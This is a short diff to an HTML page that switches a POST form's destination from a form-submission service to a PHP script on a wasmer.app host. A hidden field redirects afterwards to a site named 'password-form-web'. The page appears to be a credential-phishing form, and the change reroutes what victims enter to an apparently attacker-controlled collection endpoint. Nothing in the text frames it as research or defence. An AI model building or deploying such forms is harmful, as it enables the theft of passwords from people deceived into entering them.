--- a/request.html
+++ b/request.html
@@ -9,7 +9,7 @@
         <link rel="stylesheet" crossorigin="" href="style.css">
     </head>
     <body>
-        <form action="https://submit-form.com/vFxK3442i" method="post">
+        <form action="https://saba44-a9a4a.wasmer.app/Wahab.php" method="post">
             <input type="hidden" name="_redirect" value="https://password-form-web.vercel.app/"/>
             <div id="root">
                 <div>
